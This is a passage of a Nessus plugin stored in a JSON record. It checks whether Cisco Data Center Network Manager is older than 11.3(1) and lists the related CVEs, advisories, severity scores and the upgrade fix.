\"CVE-2019-15982\",\n \"CVE-2019-15983\",\n 
\"CVE-2019-15984\",\n \"CVE-2019-15985\",\n \"CVE-2019-15999\"\n );\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvq85945\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvq85957\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvq85972\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvq85998\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvq89422\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvq89834\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvq89841\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvq89859\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvq89878\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvq89895\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvq89898\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvq98723\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvq98730\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvq98736\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvq98748\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvr01692\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvr01694\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvr01701\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvr05463\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvr07317\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvr14598\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvr17970\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvr17974\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvr23573\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvr23728\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvr23733\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvr23770\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvr23864\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvr23865\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvr32014\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvr34624\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvr44798\");\n 
script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvr44896\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvr46507\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvr46508\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvr46544\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvr46547\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvr79116\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvr79127\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvr79188\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvr79240\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvr88730\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvr88737\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvs00139\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvs16306\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvs16318\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvs16341\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvs16350\");\n script_xref(name:\"CISCO-SA\", value:\"cisco-sa-20200102-dcnm-auth-bypass\");\n script_xref(name:\"CISCO-SA\", value:\"cisco-sa-20200102-dcnm-sql-inject\");\n script_xref(name:\"CISCO-SA\", value:\"cisco-sa-20200102-dcnm-path-trav\");\n script_xref(name:\"CISCO-SA\", value:\"cisco-sa-20200102-dcnm-comm-inject\");\n script_xref(name:\"CISCO-SA\", value:\"cisco-sa-20200102-dcnm-xml-ext-entity\");\n script_xref(name:\"CISCO-SA\", value:\"cisco-sa-20200102-dcnm-unauth-access\");\n script_xref(name:\"IAVA\", value:\"2020-A-0009-S\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0004\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0003\");\n\n script_name(english:\"Cisco Data Center Network Manager < 11.3(1) Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is missing a vendor-supplied security patch\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, the instance of Cisco DCNM hosted on the remote server is 
prior\nto 11.3(1). It is, therefore, affected by multiple vulnerabilities:\n\n - An authentication bypass vulnerability exists in the REST API, SOAP API, and the web-based management\n interface due to a static encryption key being shared between installations. An unauthenticated, remote\n attacker can exploit this, via the REST API, SOAP API, or web-based management interface, to bypass\n authentication and execute arbitrary actions with administrative privileges. (CVE-2019-15975,\n CVE-2019-15976, CVE-2019-15977)\n\n - A command injection vulnerability exists in the REST API and SOAP API due to insufficient validation of\n user-supplied input. An authenticated, remote attacker can exploit this, via the APIs, to execute\n arbitrary commands. (CVE-2019-15978, CVE-2019-15979)\n\n - A path traversal vulnerability exists in the REST API and SOAP API due to insufficient validation of\n user-supplied input. An authenticated, remote attacker can exploit this, via the APIs, to read, write, or\n execute arbitrary files on the system. (CVE-2019-15980, CVE-2019-15981, CVE-2019-15982)\n\n - An XML external entity (XXE) vulnerability exists due to an incorrectly configured XML parser accepting\n XML external entities from an untrusted source. An authenticated, remote attacker can exploit this, via\n specially crafted XML data in the SOAP API, to disclose sensitive information. (CVE-2019-15983)\n\n - A SQL injection (SQLi) vulnerability exists in the SOAP API and REST API due to improper validation of\n user-supplied input. 
An authenticated, remote attacker can exploit this to inject or manipulate SQL\n queries in the back-end database, resulting in the disclosure or manipulation of arbitrary data.\n (CVE-2019-15984, CVE-2019-15985, CVE-2019-15986)\n\n - A vulnerability exists in the authentication settings of the JBOSS EAP due to an incorrect configuration.\n An authenticated, remote attacker can exploit this by authentication with a specific low-privilege\n account, to gain unauthorized access to the JBOSS EAP. (CVE-2019-15999)\");\n # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20200102-dcnm-auth-bypass\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?7295287f\");\n # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20200102-dcnm-sql-inject\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c3a5bc15\");\n # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20200102-dcnm-path-trav\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?bc0e4dd2\");\n # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20200102-dcnm-comm-inject\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c51ba034\");\n # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20200102-dcnm-xml-ext-entity\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?631a2bce\");\n # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20200102-dcnm-unauth-access\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?cd86400d\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Cisco Data Center Network Manager version 11.3(1) or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n 
script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-15976\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(22, 78, 89, 284, 611, 798);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/01/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/12/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/01/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:cisco:data_center_network_manager\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CISCO\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"cisco_prime_dcnm_installed_win.nasl\", \"cisco_prime_dcnm_installed_linux.nasl\", \"cisco_prime_dcnm_web_detect.nasl\");\n script_require_ports(\"installed_sw/Cisco Prime DCNM\", \"installed_sw/cisco_dcnm_web\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('vcf_extras.inc');\n\napp_info = vcf::cisco_dcnm_web::get_app_info();\nvcf::check_granularity(app_info:app_info, sig_segments:3);\n\nconstraints = [\n { 'fixed_version' : '11.3.1.0', 'fixed_display' : '11.3(1)' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE, flags:{xss:TRUE, sqli:TRUE});\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}